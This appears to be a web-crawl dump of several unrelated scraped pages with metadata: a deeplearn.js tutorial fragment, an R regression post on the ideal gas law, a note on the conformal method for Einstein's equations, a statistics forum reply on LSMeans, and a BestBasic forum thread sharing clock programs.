{\nArray1D,\nInCPUMemoryShuffledInputProviderBuilder,\nGraph,\nSession,\nSGDOptimizer,\nNDArrayMathGPU,\n} from 'deeplearn';\nconst math = new NDArrayMathGPU();\nclass ColorAccessibilityModel {\nsession;\noptimizer;\nbatchSize = 300;\ninitialLearningRate = 0.06;\ninputTensor;\ntargetTensor;\npredictionTensor;\ncostTensor;\nfeedEntries;\nconstructor() {\nthis.optimizer = new SGDOptimizer(this.initialLearningRate);\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n### 训练阶段\n\n``````class ColorAccessibilityModel {\n...\ntrain() {\nmath.scope(() => {\nthis.session.train(\nthis.costTensor,\nthis.feedEntries,\nthis.batchSize,\nthis.optimizer\n);\n});\n}\n}\nexport default ColorAccessibilityModel;``````\n\n``````class ColorAccessibilityModel {\n...\ntrain(step) {\nlet learningRate = this.initialLearningRate * Math.pow(0.90, Math.floor(step / 50));\nthis.optimizer.setLearningRate(learningRate);\nmath.scope(() => {\nthis.session.train(\nthis.costTensor,\nthis.feedEntries,\nthis.batchSize,\nthis.optimizer\n);\n}\n}\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nArray1D,\nInCPUMemoryShuffledInputProviderBuilder,\nGraph,\nSession,\nSGDOptimizer,\nNDArrayMathGPU,\nCostReduction,\n} from 'deeplearn';\nclass ColorAccessibilityModel {\n...\ntrain(step, computeCost) {\nlet learningRate = this.initialLearningRate * Math.pow(0.90, Math.floor(step / 50));\nthis.optimizer.setLearningRate(learningRate);\nlet costValue;\nmath.scope(() => {\nconst cost = this.session.train(\nthis.costTensor,\nthis.feedEntries,\nthis.batchSize,\nthis.optimizer,\ncomputeCost ? CostReduction.MEAN : CostReduction.NONE,\n);\nif (computeCost) {\ncostValue = cost.get();\n}\n});\nreturn costValue;\n}\n}\nexport default ColorAccessibilityModel;``````\n\n### 推断阶段\n\n``````class ColorAccessibilityModel {\n...\npredict(rgb) {\nlet classifier = [];\nmath.scope(() => {\nconst mapping = [{\ntensor: this.inputTensor,\ndata: Array1D.new(this.normalizeColor(rgb)),\n}];\nclassifier = this.session.eval(this.predictionTensor, mapping).getValues();\n});\nreturn [ ...classifier ];\n}\n}\nexport default ColorAccessibilityModel;``````\n\n### 在 JavaScript 中可视化学习神经网络\n\nData Drives The Future" ]
[ null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.5511691,"math_prob":0.9086816,"size":32339,"snap":"2022-27-2022-33","text_gpt3_token_len":14929,"char_repetition_ratio":0.18747488,"word_repetition_ratio":0.99852943,"special_character_ratio":0.22124988,"punctuation_ratio":0.28976035,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97647697,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-29T19:23:30Z\",\"WARC-Record-ID\":\"<urn:uuid:8dc25ada-f614-4e1b-ae83-ee0685c40579>\",\"Content-Length\":\"192520\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:67708adf-5163-4a7a-917c-0dc2a6f1fefd>\",\"WARC-Concurrent-To\":\"<urn:uuid:3db18008-7edd-4b39-9eea-d36b76aacd96>\",\"WARC-IP-Address\":\"203.107.54.210\",\"WARC-Target-URI\":\"https://www.juhe.cn/news/index/id/2461\",\"WARC-Payload-Digest\":\"sha1:PAGNB6UB7B3VYFAXXLVA4DIV5I3VHQOO\",\"WARC-Block-Digest\":\"sha1:WXA5JBQ72S67FXEGV675JZVYV7LFJ6NS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103642979.38_warc_CC-MAIN-20220629180939-20220629210939-00573.warc.gz\"}"}
https://www.r-bloggers.com/2013/05/when-does-the-kinetic-theory-of-gases-fail-examining-its-postulates-with-assistance-from-simple-linear-regression-in-r/
[ "[This article was first published on The Chemical Statistician » R programming, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)\nWant to share your content on R-bloggers? click here if you have a blog, or here if you don't.\n\n#### Introduction\n\nThe Ideal Gas Law,", null, "$\\text{PV} = \\text{nRT}$, is a very simple yet useful relationship that describes the behaviours of many gases pretty well in many situations.  It is “Ideal” because it makes some assumptions about gas particles that make the math and the physics easy to work with; in fact, the simplicity that arises from these assumptions allows the Ideal Gas Law to be easily derived from the kinetic theory of gases.  However, there are situations in which those assumptions are not valid, and, hence, the Ideal Gas Law fails.\n\nBoyle’s law is inherently a part of the Ideal Gas Law.  It states that, at a given temperature, the pressure of an ideal gas is inversely proportional to its volume.  Equivalently, it states the product of the pressure and the volume of an ideal gas is a constant at a given temperature.", null, "$\\text{P} \\propto \\text{V}^{-1}$\n\n#### An Example of The Failure of the Ideal Gas Law\n\nThis law is valid for many gases in many situations, but consider the following data on the pressure and volume of 1.000 g of oxygen at 0 degrees Celsius.  I found this data set in Chapter 5.2 of ”General Chemistry” by Darrell Ebbing and Steven Gammon.\n\n      Pressure (atm) Volume (L) Pressure X Volume (atm*L)\n[1,]           0.25     2.8010                  0.700250\n[2,]           0.50     1.4000                  0.700000\n[3,]           0.75     0.9333                  0.699975\n[4,]           1.00     0.6998                  0.699800\n[5,]           2.00     0.3495                  0.699000\n[6,]           3.00     0.2328                  0.698400\n[7,]           4.00     0.1744                  0.697600\n[8,]           5.00     0.1394                  0.697000\n\nThe right-most column is the product of pressure and temperature, and it is not constant.  However, are the differences between these values significant, or could it be due to some random variation (perhaps round-off error)?\n\nHere is the scatter plot of the pressure-volume product with respect to pressure.", null, "These points don’t look like they are on a horizontal line!  Let’s analyze these data using normal linear least-squares regression in R.\n\n> linear.regression.pv.pressure = lm(pressure.times.volume~pressure)\n> summary(linear.regression.pv.pressure)\n\nCall:\nlm(formula = pressure.times.volume ~ pressure)\n\nResiduals:\nMin         1Q     Median         3Q        Max\n-8.380e-05 -5.054e-05  1.092e-05  4.946e-05  6.411e-05\n\nCoefficients:\nEstimate Std. Error  t value Pr(>|t|)\n(Intercept)  7.004e-01  3.578e-05 19578.59  < 2e-16 ***\npressure    -6.916e-04  1.354e-05   -51.09 3.77e-09 ***\n---\nSignif. codes:  0 ‘***’ 0.001 ‘**’ 0.01 ‘*’ 0.05 ‘.’ 0.1 ‘ ’ 1\n\nResidual standard error: 6.327e-05 on 6 degrees of freedom\nMultiple R-squared: 0.9977, Adjusted R-squared: 0.9973\nF-statistic:  2610 on 1 and 6 DF,  p-value: 3.772e-09\n\nEven though the magnitude of the slope is only 0.0006916, the p-value of the slope shows that there is strong evidence that the product of pressure and volume is not constant with respect to pressure.  Here is the same scatter plot above with the regression line added.  Note how I used the abline() and text() functions to add the line and the equation of the regression line, respectively.  As usual, I used png() and dev.off() to save the image to my folder of choice.\n\npng('INSERT YOUR DIRECTORY PATH HERE/regression pv vs pressure.png')\nplot(pressure, pressure.times.volume, main = expression(\"(Pressure X Volume) for 1.000 g of Oxygen at 0\"^0*\"C\"), ylab = 'Pressure X Volume (atm*L)', xlab = 'Pressure (atm)')\nabline(linear.regression.pv.pressure)\ntext(2, 0.6975, 'y = 0.7004 - 0.0006916x')\ndev.off()", null, "This example for oxygen is consistent with experimental results for many other gases, which show that\n\n- the Ideal Gas Law holds well for low pressures and moderate temperatures\n\n- the Ideal Gas Law fails at high pressures and low temperatures\n\n#### Examining the Postulates of the Kinetic Theory of Gases – Why and When They Fail\n\nLet’s go back to the assumptions of the kinetic theory of gases to see which assumptions may not hold under high pressures or low temperatures.  Here are 2 key ones (numbered as #1 and #3 in Chapter 5 of “General Chemistry” by Darrell Ebbing and Steven Gammon).\n\nPostulate #1: The volume of space occupied by gas particles is negligible compared with the total gas volume.  This allows the theory to model the gas particles as freely moving throughout the entire volume of the gas.  At low pressures, the volume of the individual gas particles is negligible compared to the total volume of the gas,", null, "$V$.  However, at high pressures, the particles are closer to and collide with each other more frequently, so their individual volume becomes more important; the space through which the particle moves becomes significantly different from", null, "$V$.\n\nPostulate #3: The forces of attraction between the gas particles (i.e. the intermolecular forces) in a gas are weak or negligible.\n\n• At low pressures, the particles are farther apart, so these intermolecular forces are very weak, and this postulate holds well.  At high pressures, the gas particles are closer together, so these intermolecular forces are strong enough to affect the collisions of the molecules and pull them slightly away from the walls of the container.  This reduces the pressure that the gas exerts on the container’s walls.\n• At high temperatures, the particles move too fast for the weak intermolecular forces to be attracted by them.  However, at low temperatures, the molecules are moving slower – slow enough that they start to become attracted to nearby molecules.\n\nIn a later post, I will discuss the van der Waals equation, which incorporates these deviations from the ideal assumptions of the kinetic theory of gases to modify the Ideal Gas Law.\n\n#### Reference:\n\nChapter 5, Sections 2 and 8.  ”General Chemistry” by Darrell Ebbing and Steven Gammon.  6th Edition, 1999.\n\nFiled under: Applied Statistics, Physical Chemistry, R programming Tagged: abline(), Boyle's law, constant temperature, dev.off(), gas, gases, ideal gas law, intermolecular forces, kinetic theory, kinetic theory of gas, kinetic theory of gases, linear regression, lm(), oxygen, plot, plots, plotting, PNG, pressure, regression, scatter plot, temperature, text, volume", null, "", null, "" ]
[ null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://chemicalstatistician.files.wordpress.com/2013/05/scatter-plot-pv-vs-pressure.png", null, "https://chemicalstatistician.files.wordpress.com/2013/05/regression-pv-vs-pressure.png", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://feeds.wordpress.com/1.0/comments/chemicalstatistician.wordpress.com/848/", null, "https://i0.wp.com/stats.wordpress.com/b.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.86684805,"math_prob":0.96981,"size":6340,"snap":"2020-45-2020-50","text_gpt3_token_len":1622,"char_repetition_ratio":0.12720959,"word_repetition_ratio":0.05899705,"special_character_ratio":0.27066246,"punctuation_ratio":0.15861027,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9905582,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16],"im_url_duplicate_count":[null,null,null,null,null,null,null,7,null,null,null,null,null,6,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-22T21:39:41Z\",\"WARC-Record-ID\":\"<urn:uuid:e34620cd-8210-424b-937f-9339dbbb00db>\",\"Content-Length\":\"97401\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a9203407-48aa-4a34-8f49-de242b366a57>\",\"WARC-Concurrent-To\":\"<urn:uuid:9a8ca125-3db7-4281-9f4d-8aebb43c879c>\",\"WARC-IP-Address\":\"104.28.8.205\",\"WARC-Target-URI\":\"https://www.r-bloggers.com/2013/05/when-does-the-kinetic-theory-of-gases-fail-examining-its-postulates-with-assistance-from-simple-linear-regression-in-r/\",\"WARC-Payload-Digest\":\"sha1:O7MSEIE5XFFTENGQ27F7GADLJJN64BLI\",\"WARC-Block-Digest\":\"sha1:2MPWAXRQSSULL2ND2EMUO7BBHDJNVGVO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107880038.27_warc_CC-MAIN-20201022195658-20201022225658-00240.warc.gz\"}"}
https://anhngq.wordpress.com/2010/06/05/
[ "# Ngô Quốc Anh\n\n## June 5, 2010\n\n### Why the conformal method is useful in studying the Einstein equations?\n\nFiled under: Nghiên Cứu Khoa Học, PDEs, Riemannian geometry — Tags: — Ngô Quốc Anh @ 19:20\n\nI presume you have some notions about general relativity, especially the Einstein equations", null, "${\\rm Eins}_{\\alpha\\beta}=T_{\\alpha\\beta}$.\n\nAs these equations are basically hyperbolic for a suitable metric, it is reasonable to study the Cauchy problems for them. Under the Gauss and Codazzi conditions, we have two constraints called Hamiltonian and Momentum constrains. Cauchy problem is to determine the solvable of these constrains of variables", null, "$K$-the extrinsic curvature and", null, "$g$-the spatial metric. Interestingly, the conformal method says that we can start with an arbitrary metric then we recast the constrain equations into a form which is more amenable to analysis by splitting the Cauchy data. In this method, we try to solve", null, "$\\gamma$ within the conformal class represented by the initial metric. So, in general, the conformal factor is chosen so that we eventually have a simplest model.\n\nThis idea is given via the following theorem.\n\nTheorem. Let", null, "$\\mathcal D =(\\gamma, \\sigma, \\tau,\\psi,\\pi)$ be a conformal initial data set for the Einstein-scalar field constraint equations on", null, "$\\Sigma$. If", null, "$\\displaystyle \\widetilde \\gamma =\\theta^\\frac{4}{n-2}\\gamma$\n\nfor a smooth positive function", null, "$\\theta$, then we define the corresponding conformally transformed initial data set by", null, "$\\displaystyle\\widetilde{\\mathcal D} =(\\widetilde\\gamma, \\widetilde \\sigma, \\widetilde \\tau,\\widetilde\\psi,\\widetilde \\pi)=(\\theta^\\frac{4}{n-2}\\gamma, \\theta^{-2}\\sigma, \\tau,\\psi,\\theta^\\frac{-2n}{n-2}\\pi)$.\n\nLet", null, "$W$ be the solution to the conformal form of the momentum constrain equation w.r.t. the conformal initial data set", null, "$\\mathcal D$ and let", null, "$\\widetilde W$ be the solution to the conformal form of the momentum constrain equation w.r.t. the conformal initial data set", null, "$\\widetilde{\\mathcal D}$ (we just assume both exist). Then", null, "$\\varphi$ is a solution to the Einstein scalar field Lichnerowicz equation for the conformal data", null, "$\\mathcal D$ with", null, "$W$", null, "$\\displaystyle \\Delta_\\gamma \\varphi - \\mathcal R_{\\gamma, \\psi}\\varphi +\\mathcal A_{\\gamma, W, \\pi}\\varphi^{-\\frac{3n-2}{n-2}}-\\mathcal B_{\\tau, \\psi}\\varphi^\\frac{n+2}{n-2}=0$\n\nif and only if", null, "$\\theta^{-1}\\varphi$ is a solution to the Einstein scalar field Lichnerowicz equation for the conformal data", null, "$\\widetilde{\\mathcal D}$ with", null, "$\\widetilde W$", null, "$\\displaystyle \\Delta_{\\widetilde\\gamma} (\\theta^{-1}\\varphi) - \\mathcal R_{\\widetilde\\gamma, \\widetilde\\psi}(\\theta^{-1}\\varphi) +\\mathcal A_{\\widetilde\\gamma, \\widetilde W, \\widetilde\\pi}(\\theta^{-1}\\varphi)^{-\\frac{3n-2}{n-2}}-\\mathcal B_{\\widetilde\\tau, \\widetilde\\psi}(\\theta^{-1}\\varphi)^\\frac{n+2}{n-2}=0$.\n\nWe refer the reader to a paper due to Yvonne Choquet-Bruhat et al. [here] published in Class. Quantum Grav. in 2007 for details. We adopt this theorem from that paper, however, there is no proof there.\n\n(more…)" ]
[ null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8917493,"math_prob":0.99875474,"size":1772,"snap":"2021-31-2021-39","text_gpt3_token_len":379,"char_repetition_ratio":0.16402715,"word_repetition_ratio":0.1736111,"special_character_ratio":0.19018058,"punctuation_ratio":0.103975534,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999912,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-31T13:16:44Z\",\"WARC-Record-ID\":\"<urn:uuid:3d79942d-c4e0-40ad-96cf-ad5e0ba75ed2>\",\"Content-Length\":\"86190\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:73eb8c77-fd5c-4c4e-91c6-2d40e3f3e2f6>\",\"WARC-Concurrent-To\":\"<urn:uuid:3fffbbd4-5e14-4256-98fb-fcdd74a37097>\",\"WARC-IP-Address\":\"192.0.78.13\",\"WARC-Target-URI\":\"https://anhngq.wordpress.com/2010/06/05/\",\"WARC-Payload-Digest\":\"sha1:WFXTJ2Y2TWV4N5WHJLBX3RGNWAOFDRW6\",\"WARC-Block-Digest\":\"sha1:DZ6YQ4UTU5FGO6SLETMWD4Y7DDV52X2U\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154089.6_warc_CC-MAIN-20210731105716-20210731135716-00543.warc.gz\"}"}
https://forum.bebac.at/forum_entry.php?id=18503
[ "## Huge gap in my understanding [General Sta­tis­tics]\n\nDear ElMaestro,\n\nI think the statement “LSMean difference not being equal to maximum likelihood differences” and should be re-worded as “LSMean difference not being equal to maximum likelihood differences in case of unbalanced experiments”.\n\nIn other words, the use of “lsmeans” is motivated to account for unbalances in experiments as MLE estimation is condition on the data observed.\n\nConsider an experiment analyzed with a model of the form\n\nlm(y ~ treat + covariate)\n\nwhere treat is a treatment factor and covariate is an additional continuous covariate. With this model you can get estimates condition on treat and the covariate (i.e. E(Y|treat,covariate)) based on maximum likelihood estimation.\n\nHowever, we are frequently interested in estimates for E(Y|treat) which cannot be formally found by the model.\n\n- If the experiment is balanced, I expect that “lsmeans” estimates are identical to the average of the observations grouped by treat (i.e. “lsmeans” estimates are identical to MLE estimates).\n\n- If the experiment is unbalanced, a corresponding estimate for E(Y|treat) can be found via using the average of fitted values condition on the mean of the covariate across all levels of treat (i.e. “lsmeans” estimates are not identical to MLE estimates).\n\nLikely consider a simulation study\n\n1) Specify a data generating process of the form: Y ~ treat + covariate + epsilon\n2) Introduce a sampling strategy leading to an unbalanced sample data set\n3) Get estimates (MLE and “lsmeans”) from the sample data and compare it with the true value for E(Y|treat).\n\nI would expect that the “lsmeans” estimate is closer to the true value (i.e. population value for E(Y|treat)) than model estimates obtained by maximum likelihood estimates. You can to this exercise also for a balanced experiment which should give identical estimates via “lsmeans” and MLE.\n\nBest regards & hope this helps\n\nMartin\n\nPS.: We can discuss this also offline where Mr. Schütz has my contact information", null, "", null, "Ing. Helmut Schütz", null, "" ]
[ null, "https://static.bebac.at/pics/animated-ukraine-flag.gif", null, "https://static.bebac.at/img/bebac.svg", null, "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAA0AAAAPBAMAAADNDVhEAAAAMFBMVEX////kUCbvZSrpWyvqe1j48vHr6+voa0fwwrPph2v149zylW/up5LytaTsmYD01cq9FiK0AAAAAXRSTlMAQObYZgAAAH1JREFUCJljMBQEgQKGQkFBIyVlBwbHypm7dztPYJh4LC009PEDhofPnszeXXyA4eA0R6D8BYaLbkBxxwaGxoqOjqWKHxg+yjkatSouYFgodtHol2IAQ6BUVmu8IgMDo8j5+CPqDAzMIHPNGRh4CgWNBWsZGBi4rlheZWAAANuzJqFyju9TAAAAAElFTkSuQmCC", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8781176,"math_prob":0.9760986,"size":4631,"snap":"2023-14-2023-23","text_gpt3_token_len":1106,"char_repetition_ratio":0.13097039,"word_repetition_ratio":0.91471803,"special_character_ratio":0.23796156,"punctuation_ratio":0.081947744,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97106546,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-04-01T03:54:51Z\",\"WARC-Record-ID\":\"<urn:uuid:ec04abb5-d015-481b-ae68-a83d65ef87f9>\",\"Content-Length\":\"14762\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f557df42-946c-428a-8b1b-ce116ee0454f>\",\"WARC-Concurrent-To\":\"<urn:uuid:2fa8019f-58a4-443e-a519-7c9b36c9b789>\",\"WARC-IP-Address\":\"172.67.142.160\",\"WARC-Target-URI\":\"https://forum.bebac.at/forum_entry.php?id=18503\",\"WARC-Payload-Digest\":\"sha1:5IKAZPNEFR34E2G4SL44ZQ6H54YSPLPE\",\"WARC-Block-Digest\":\"sha1:C7ERLMXW4NDFWDKTCA3DX2CX7ZGHBGNB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296949701.0_warc_CC-MAIN-20230401032604-20230401062604-00674.warc.gz\"}"}
https://bestbasic.net/forum/viewtopic.php?f=4&t=34&sid=1a24b75095636cc9936bb746124dc49e
[ "## Simple clock\n\nFor finished programs\nudo\nPosts: 6\nJoined: Mon Sep 30, 2019 8:55 am\n\n### Simple clock\n\nA version of a simple clock in BestBasic...\n\nCode: Select all\n\n``````' Clock\n' U. Rabe, 2019\n' Done with BestBasic\n' It's public domain\n\n' define some constants\nscr size 600,600 \t' def size of graphic screen\nxm ym = 300,300\t\t' center of screen\nr0 r1 r2 = 250,220,170\t' radius: clock, large finger, small finger\nm1 = -1 ' reminder for minutes\ndraw manual\ndraw size 15\n\ndo\t'run clock\nh m s = now|3\nif m <> m1\nm1 = m\ndraw clear 1,1,1\ngosub print_clock_face\ngosub draw_fingers\ndraw update\nendif\nredo\n\nprint_clock_face\n' minutes dots\nfor i=0 to 60\nw = i*6 * PI/180\nx = r0 * sin(w)\ny = r0 * cos(w)\ndraw fcirc ym+x,ym+y,5\nnext i\n' hours dots\nfor i=0 to 12\nw = i*30 * PI/180\nx = r0 * sin(w)\ny = r0 * cos(w)\ndraw fcirc ym+x,ym+y,10\nnext i\n' central dot\ndraw fcirc xm,ym,20\nreturn\n\ndraw_fingers\n' hours\nw = ((h+m/60)*30) * PI/180\nx = r2 * sin(w)\ny = r2 * cos(w)\ndraw line xm,ym,xm+x,ym-y\n' minutes\nw = (m*6) * PI/180\nx = r1 * sin(w)\ny = r1 * cos(w)\ndraw line xm,ym,xm+x,ym-y\nreturn\n\n``````\n\nkibernetik\nSite Admin\nPosts: 147\nJoined: Tue Aug 06, 2019 3:03 pm\n\n### Re: Simple clock\n\nCute and stylish clock!\n\nCurrently this program consumes 100% of CPU. I will add a function to minimize CPU consumption in such 'slow' applications.\n\nudo\nPosts: 6\nJoined: Mon Sep 30, 2019 8:55 am\n\n### Re: Simple clock\n\nThat would be nice.\nBestBasic is a really nice interpreter.\nIt remembers me of working with a WANG 2200 at about 1975!\nhttps://en.wikipedia.org/wiki/Wang_2200\n\nRegards\n\nUdo\n\nkibernetik\nSite Admin\nPosts: 147\nJoined: Tue Aug 06, 2019 3:03 pm\n\n### Re: Simple clock\n\nThank you for your comment!", null, "kibernetik\nSite Admin\nPosts: 147\nJoined: Tue Aug 06, 2019 3:03 pm\n\n### Re: Simple clock\n\nOk, this function is called CPU RELAX. It can be used like this:\n\nCode: Select all\n\n``````...\nendif\ncpu relax\ngoto run_clock\n...``````\n\nudo\nPosts: 6\nJoined: Mon Sep 30, 2019 8:55 am\n\n### Re: Simple clock\n\nAnd it works...\n\nCode: Select all\n\n``````do\t'run clock\nh m s = now|3\nif m <> m1\nm1 = m\ndraw clear 1,1,1\ngosub print_clock_face\ngosub draw_fingers\ndraw update\nendif\ncpu relax\nredo\n``````\n\nDutchman\nPosts: 151\nJoined: Tue Aug 06, 2019 4:47 pm\nLocation: Netherlands\n\n### Re: Simple clock\n\nWith seconds, showing more activity:\n\nCode: Select all\n\n``````' Clock\n' U. Rabe, 2019\n' Done with BestBasic\n' It's public domain\n' seconds added by Ton Nillesen\n\n' define some constants\nscr size 600,600 \t' def size of graphic screen\nxm ym = 300,300\t\t' center of screen\nr0 r1 r2 = 250,220,170\t' radius: clock, large finger, small finger\nm1 = -1 ' reminder for minutes\ndraw manual\ndraw size 15\n\ndo\t'run clock\nh m s = now|3\nif s <> s1\ns1 = s\ndraw clear 1,1,1\ngosub print_clock_face\ngosub draw_fingers\ndraw update\nendif\n'CPU RELAX ' not in versio 1.2\nredo\n\nprint_clock_face\n' minutes dots\nfor i=0 to 60\nw = i*6 * PI/180\nx = r0 * sin(w)\ny = r0 * cos(w)\ndraw fcirc ym+x,ym+y,5\nnext i\n' hours dots\nfor i=0 to 12\nw = i*30 * PI/180\nx = r0 * sin(w)\ny = r0 * cos(w)\ndraw fcirc ym+x,ym+y,10\nnext i\n' central dot\ndraw fcirc xm,ym,20\nreturn\n\ndraw_fingers\n' hours\nw = ((h+m/60)*30) * PI/180\nx = r2 * sin(w)\ny = r2 * cos(w)\ndraw line xm,ym,xm+x,ym-y\n' minutes\nw = (m*6) * PI/180\nx = r1 * sin(w)\ny = r1 * cos(w)\ndraw line xm,ym,xm+x,ym-y\n' seconds\nDRAW COLOR 1,0,0\nDRAW SIZE 4\nw = (s*6) * PI/180\nx = r0 * sin(w)\ny = r0 * cos(w)\ndraw line xm-x/8,ym+y/8,xm+x,ym-y\nDRAW FCIRC xm,ym,8\nDRAW COLOR 0,0,0\nDRAW SIZE 15\nreturn\n``````\n.", null, "with seconds.JPG (22.35 KiB) Viewed 2704 times\nIt is still a long way to go\n\nudo\nPosts: 6\nJoined: Mon Sep 30, 2019 8:55 am\n\n### Re: Simple clock\n\nNice! Thank You!\n\nkibernetik\nSite Admin\nPosts: 147\nJoined: Tue Aug 06, 2019 3:03 pm\n\n### Re: Simple clock\n\nSmooth minute hand movement, minor adjustments.\n\nCode: Select all\n\n``````' Clock\n' U. Rabe, 2019\n' Done with BestBasic\n' It's public domain\n' seconds added by Ton Nillesen\n\n' define some constants\nscr size 600,600 ' def size of graphic screen\nxm ym = 300,300 ' center of screen\nr0 r1 r2 = 250,220,170 ' radius: clock, large finger, small finger\nd1 d2 = 5,10 ' radius: minute dots, hour dots\ndraw manual\n\ndo\t'run clock\nh m s = now|3\nif s<>s1\ns1 = s\ndraw clear 1,1,1\ngosub print_clock_face\ngosub draw_fingers\ndraw update\nendif\ncpu relax\nredo\n\nprint_clock_face\ndraw color 0,0,0\n' hours dots\nfor i=1 to 12\nw = i*30 * PI/180\nx = r0 * sin(w)\ny = r0 * cos(w)\ndraw fcirc ym+x,ym+y,d2\nnext i\n' minutes dots\nfor i=1 to 60\nw = i*6 * PI/180\nx = r0 * sin(w)\ny = r0 * cos(w)\ndraw fcirc ym+x,ym+y,d1\nnext i\n' central dot\ndraw fcirc xm,ym,20\nreturn\n\ndraw_fingers\ndraw color 0,0,0\ndraw size 15\n' hours\nw = ((h+m/60)*30) * PI/180\nx = r2 * sin(w)\ny = r2 * cos(w)\ndraw line xm,ym,xm+x,ym-y\n' minutes\nw = (m*6+s/10) * PI/180\nx = r1 * sin(w)\ny = r1 * cos(w)\ndraw line xm,ym,xm+x,ym-y\n' seconds\ndraw color 1,0,0\ndraw size 4\nw = (s*6) * PI/180\nx = (r0-d2*2) * sin(w)\ny = (r0-d2*2) * cos(w)\ndraw line xm-x/8,ym+y/8,xm+x,ym-y\n' central seconds dot\ndraw fcirc xm,ym,8\nreturn\n``````", null, "Без названия.jpg (34.09 KiB) Viewed 2698 times\n\nudo\nPosts: 6\nJoined: Mon Sep 30, 2019 8:55 am\n\n### Re: Simple clock\n\nThis is version 2 with changes...\n\nCode: Select all\n\n``````' Clock\n' version 2.0\n' U. Rabe, 2019\n' Done with BestBasic\n' It's public domain\n' seconds added by Ton Nillesen\n' adde some proposals by kibernetik\n' some optical changes, U. Rabe\n\n' define some constants\nscr size 600,600 \t' def size of graphic screen\nxm ym = 300,300\t\t' center of screen\nr0 r1 r2 = 250,220,170\t' radius: clock, large finger, small finger\nd1 d2 = 5,10 \t' diameter face dots\ns1 = -1 ' reminder for seconds\ndraw manual\n\ndo\t'run clock\nh m s = now|3\nif s <> s1\ns1 = s\ndraw clear 0.9,0.9,0.9\ngosub print_clock_face\ngosub draw_fingers\ndraw update\nendif\ncpu relax\nredo\n\nprint_clock_face\ndraw size 1\ndraw color 0.6,0.6,0.6\n' minutes dots\nfor i=0 to 60\nw = i*6 * pi/180\nx = r0 * sin(w)\ny = r0 * cos(w)\ndraw fcirc xm+x,ym+y,d1\nnext i\ndraw color 0.3,0.3,0.3\n' hours dots\nfor i=0 to 12\nw = i*30 * pi/180\nx = r0 * sin(w)\ny = r0 * cos(w)\ndraw fcirc xm+x,ym+y,d2\nnext i\nreturn\n\ndraw_fingers\ndraw color 0,0,0\n' central dot\ndraw fcirc xm,ym,20\ndraw size 12\n' hours\nw = ((h+m/60)*30) * pi/180\nx = r2 * sin(w)\ny = r2 * cos(w)\ndraw line xm,ym,xm+x,ym-y\n' minutes\nw = ((m+s/60)*6) * pi/180\nx = r1 * sin(w)\ny = r1 * cos(w)\ndraw line xm,ym,xm+x,ym-y\n' seconds\ndraw size 4\nw = (s*6) * pi/180\nx = (r0-d2*2) * sin(w)\ny = (r0-d2*2) * cos(w)\ndraw color 1,0,0\ndraw line xm-x/8,ym+y/8,xm+x,ym-y\ndraw fcirc xm,ym,8\nreturn\n``````", null, "clock.png (33.54 KiB) Viewed 2690 times" ]
[ null, "https://bestbasic.net/forum/images/smilies/icon_e_smile.gif", null, "https://bestbasic.net/forum/download/file.php", null, "https://bestbasic.net/forum/download/file.php", null, "https://bestbasic.net/forum/download/file.php", null ]
